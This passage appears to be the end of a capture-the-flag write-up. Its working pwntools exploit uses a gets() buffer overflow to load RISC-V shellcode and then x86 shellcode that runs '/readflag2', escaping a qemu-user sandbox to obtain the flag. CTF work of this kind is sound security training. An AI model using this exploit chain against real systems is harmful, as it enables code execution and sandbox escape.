assert b"\n" not in sc  # gets() stops at a newline

gets = 0x16a5a
call_gets = 0x10442

data = cyclic(280) + p64(0x6f000 + 0x128)
data += p64(call_gets)
data += cyclic(504) + p64(0x6f000)
# data += p64()

time.sleep(0.5)
sla(b"flag:", data)

sl(sc)  # second gets() reads the RISC-V shellcode into 0x6f000
time.sleep(0.5)
x86_shellcode = asm(shellcraft.linux.execve("/readflag2") + shellcraft.linux.exit())
# x86_shellcode = asm(shellcraft.amd64.infloop())

payload = b"\x90"*0x100 + x86_shellcode
payload = payload.ljust(0x200, b"\x00")  # the RISC-V side reads 0x200 bytes
se(payload)
p.interactive()
#flag{qemu_user_s4ndb0x_is_dangerous}

This will give us the last flag.

References